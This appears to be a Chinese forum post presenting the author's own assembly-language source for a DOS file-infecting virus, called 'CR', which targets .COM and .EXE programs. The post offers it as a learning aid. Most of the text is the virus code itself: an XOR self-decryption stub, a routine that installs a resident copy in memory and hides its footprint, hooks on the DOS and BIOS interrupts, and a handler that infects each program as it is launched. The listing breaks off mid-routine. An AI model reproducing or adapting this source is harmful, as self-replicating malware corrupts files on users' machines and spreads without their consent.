  • 自己用汇编语言写的一个病毒(源码)
  • 这个病毒虽然比较简单，但是麻雀虽小，五脏俱全。隐藏、感染、加密等模块应有尽有（只是不会破坏），是一个比较标准的DOS病毒，可以感染.EXE（不包括PE）和.COM的可执行文件。
    如果您希望学习汇编语言,用这个程序作为入门指导倒是比较合适的。
    染毒文件会被打上“CR”的标记,我们姑且称它为CR病毒吧。
    baseoff equ 107h	;offset of 'begin' in the org-100h image (the entry stub mov ax,imm16 / jmp ax / 'cr' is 7 bytes). The resident copy is made from 'begin', so labels inside it are addressed as label-baseoff.
    
    
    
    code	segment	;single code segment, tiny-model layout: cs=ds=es=ss
    
    	assume cs:code,ds:code,es:code,ss:code
    
    	org 100h	;.COM image: code starts right after the 256-byte PSP
    
    main:	
    	;Entry stub (7 bytes at 100h..106h). 'infecthead' below carries the same bytes, which are
    	;written over a victim's first bytes; the 'cr' word at 105h is the infection marker tested
    	;as 7263h elsewhere in this file and is a usable static signature for an infected .COM.
    	mov ax,offset begin	;assembled as 107h; for an infected host this immediate must be fixed up by the infection routine (not on this page)
    
    	jmp ax
    
    	
    
    	db 'cr'		;marker at offset 105h
    
    		
    
    begin:	
    	;Start of the resident image (begin == baseoff == 107h).
    	;Saves the caller's es/ds (DOS sets DS=ES=PSP at program entry) for the later hand-off to
    	;the host in alreadyresident / GotoExe.
    	push es
    
    	push ds
    
    	
    
    	mov ax,cs
    
    	mov ds,ax
    
    	mov es,ax
    
    	
    
    	call get_ip	;pushes a return address (112h when unrelocated); get_ip leaves it in bx
    
    	push ax		;ax still holds cs: this is the segment half of the far return taken by 'retf' in decode
    
    	mov ax,offset encodebegin	;unrelocated offset; corrected by the delta in bx at get_ip_end
    
    	jmp short get_ip_end	;skip over the oldhead data and the get_ip helper
    
    	
    
    oldhead	db 0h,4ch,0cdh,21h,6 dup (?)	;saved copy of the host's original first bytes (7 are restored to 100h in alreadyresident; 10 reserved). Byte 0 is also the XOR key used by decode. Initial word 4c00h means "no host" (alreadyresident then exits via go_out); word 6163h means the host is an EXE.
    
    
    
    get_ip	label near
    	;Delta-offset helper: read the return address pushed by 'call get_ip' without popping it
    	;(ret still consumes it).  Out: bx = caller's return offset.  Clobbers: bp.
    	mov bp,sp
    
    	mov bx,[bp]
    
    	ret
    
    get_ip_end:
    
    	sub bx,112h		;get current offset -- 112h is the unrelocated return address, so bx = load delta (0 when the bare virus runs)
    
    	add ax,bx		;ax = actual address of encodebegin
    
    	push ax
    
    	pop di			;di = si = encodebegin: decode happens in place
    
    	mov si,di
    
    	cld
    
    	mov cx, offset endtag-offset encodebegin	;length of the XOR-encoded region (endtag is defined beyond this page)
    
    	mov dl, byte ptr [oldhead+bx]	;key = first byte of the host's original header, so the encoded body differs per host; the decoder stub and the 'cr' tags stay constant (signature there, not on the body). Bare virus: key 0 -> decode is a no-op
    
    	push si			;offset half of the far return taken by retf below
    
    decode:	
    
    	lodsb
    
    	xor al,dl
    
    	stosb			;decode at runtime
    
    	loop decode
    
    	retf			;retf  cs:ip=encodebegin   (pops the si pushed above, then the cs pushed in 'begin')
    
    	db 62h			;two bytes ('be') after the retf; never executed
    
    	db 65h
    
    
    
    encodebegin:
    	;Start of the XOR-protected region. Installation: test for a resident copy at 9F80h,
    	;lower the BIOS memory-size word by 2 KB, copy the body to 9F80h:0000 and hook INT 21h / INT 12h.
    	;In: bx = load delta.  Preserves bx.
    	mov ax,9f80h
    
    	mov es,ax
    
    	cmp es:word ptr [virustag-baseoff],7263h	;'cr' at 9F80h:(virustag-baseoff) => already resident (memory indicator for detection)
    
    	jz alreadyresident		
    
    	
    
    	push ds	
    
    	mov ax,40h
    
    	mov ds,ax
    
    	mov di,13h	;get free memory -- 0040h:0013h is the BIOS base-memory-size word (KB)
    
    	sub word ptr [di],2	;report 2 KB less: 9F80h:0000 is linear 9F800h = 638 KB, the top 2 KB of 640 KB. NOTE(review): this only changes what INT 12h callers see; DOS's own allocation chain is not adjusted here, so the copy may still be overwritten -- verify
    
    	pop ds
    
    
    
    	mov di,0
    
    	mov si,bx
    
    	add si,baseoff	;ds:si = actual 'begin'
    
    	mov cx,2048
    
    	cld
    
    
    
    	rep movsb	;resident in memory -- 2048 bytes from 'begin' to 9F80h:0000
    
    	
    
    	nop
    
    	push bx
    
    	
    
    	mov ax,9f80h
    
    	mov ds,ax	;ds = resident segment for the rest of the installation
    
    	mov ax,3521h
    
    	int 21h		;get current INT 21h vector -> es:bx
    
    	mov ds:word ptr[oldint21-baseoff],bx
    
    	mov dx,bx	;dead store: dx is overwritten before it is used
    
    	mov ds:word ptr[oldint21-baseoff+2h],es
    
    	
    
    	mov dx,offset newint21proc-baseoff
    
    	mov ax,2521h
    
    	int 21h		;INT 21h now points at the resident copy (9F80h:newint21proc-baseoff)
    
    
    
    	mov dx,offset newint12proc-baseoff
    
    	mov ax,2512h
    
    	int 21h		;INT 12h (BIOS memory size) also hooked; newint12proc is beyond this page -- presumably masks the 2 KB taken above, confirm on the continuation
    
    	pop bx
    
    	
    
    alreadyresident:
    	;Hand control back to the host.  In: bx = load delta; the es/ds saved at 'begin' are still on the stack.
    	mov ax,cs
    
    	mov ds,ax
    
    	mov es,ax
    
    	mov si,offset oldhead
    
    	add si,bx	;si = actual oldhead
    
    	mov di,0100h
    
    	
    
    	cmp cs:word ptr oldhead[bx],6163h	;this is an infected EXE file 
    
    	jz GotoExe
    
    	
    
    	cld
    
    	mov cx,7
    
    	rep movsb	;COM host: put the original 7 bytes back at 100h
    
    	
    
    	pop ds		;restore the DS/ES saved at 'begin'
    
    	pop es
    
    	
    
    	cmp cs:word ptr oldhead[bx],4c00h	;bare virus, no host: just terminate
    
    	jz go_out
    
    GotoOldHead:					;this is an infected COM file
    
    	mov ax,0100h
    
    	jmp ax		;run the restored host from its original entry point
    
    GotoExe:
    
    	pop ds		;ds = value saved at 'begin' (PSP segment at DOS program entry)
    
    	pop es
    
    	mov ax,ds
    
    	add ax,cs:ini_ss[bx]			;set old ss
    
    	add ax,10h	;PSP + 10h = load segment of the EXE image; the ini_* values are relative to it
    
    	mov ss,ax
    
    	mov ax,cs:ini_sp[bx]			;set old sp
    
    	mov sp,ax
    
    	mov ax,ds
    
    	add ax,10h
    
    	add cs:ini_cs[bx],ax			;set old cs -- relocates the stored word in place (writes into its own data)
    
    	jmp cs:dword ptr ini_ip[bx]		;jump to the normal EXE   (far jump through ini_ip:ini_cs)
    
    go_out:
    
    	mov ah,4ch
    
    	int 21h		;DOS terminate process
    
    	
    
    oldint21 dw 2 dup(?)	;saved original INT 21h vector (offset, segment), filled during installation
    
    filehead db 18h dup (?)	;first 18h bytes of the file opened by tryinfect (read with ah=3fh, cx=18h); 'MZ' is tested at its start
    
    filesize dw 2 dup(?)	;low/high words of the target's size (filled by getfilesize, which is beyond this page)
    
    virustag db 'cr'	;resident-copy marker tested at 9F80h:(virustag-baseoff) by encodebegin
    
    infecthead:	
    	;The 7-byte stub written over a victim's first bytes (same bytes as 'main'). The
    	;'offset begin' immediate has to be adjusted for the victim by the infection routine (not on this page).
    	mov ax,offset begin
    
    	jmp ax
    
    	db 'cr'
    
    temp	dw ?
    
    
    
    ini_ip	dw ?	;host EXE entry (CS:IP) and initial stack (SS:SP), relative to the load segment; consumed by GotoExe
    
    ini_cs	dw ?
    
    ini_ss	dw ?
    
    ini_sp	dw ?
    
    
    
    newint21proc:
    	;Resident INT 21h handler. Only AH=4Bh (EXEC) is intercepted, so infection is triggered
    	;by running a program; tryinfect opens the path the caller passed in ds:dx (ax=3d02h).
    	;Everything else goes to the 'int21h' label, which is beyond this page -- presumably a far
    	;jump through oldint21, confirm on the continuation.
    	cmp ah,4bh
    
    	jz tryinfect
    
    	jmp int21h
    
    tryinfect:
    
    	push ax			;begin to infect
    
    	push cx
    
    	push es
    
    	push di
    
    	push bx
    
    	push dx
    
    	push ds
    
    
    
    	mov ax,3d02h
    
    	int 21h
    
    	jnc openok
    
    	jmp notinfect		;open fail? not infect
    
    openok:	
    
    	push ds
    
    	push dx
    
    	push cs
    
    	pop ds
    
    	mov dx,offset filehead-baseoff
    
    	mov bx,ax
    
    	mov cx,18h
    
    	mov ah,3fh
    
    	int 21h	
    
    	pop dx
    
    	pop ds
    
    	jc closefilenear		;read fail? not infect
    
    	
    
    	mov di,offset filehead-baseoff
    
    	mov ax,9f80h
    
    	mov es,ax
    
    	
    
    	cmp word ptr es:[di],5a4dh	;'MZ' in head? EXE file...
    
    	jnz COM_infect
    
    	jmp EXE_infect
    
    	
    
    COM_infect:	
    
    	cmp word ptr es:[di+5],7263h	;'cr' in 105h? not infect
    
    	jz closefilenear   
    
    
    
    	call getfilesize
    
    	cmp dx,0
    
    	jnz closefilenear			; file is too big..not infect
    
    	cmp ax,63000
    
    	ja  closefilenear			; file is too big..not infect
    
    	cmp ax,10
    
    	jb  closefilenear			; file is too small..not infect
    
    	
    
    	;infect begin,hahahahaha....
    
    	jmp infectbegin
    
    closefilenear:
    
    	jmp closefile
    
    infectbegin:	
    
    	mov ax,9f80h
    
    	mov ds,ax
    
    	mov es,ax
    
    	mov si,offset filehead-baseoff
    
    	mov di,offset oldhead-baseof

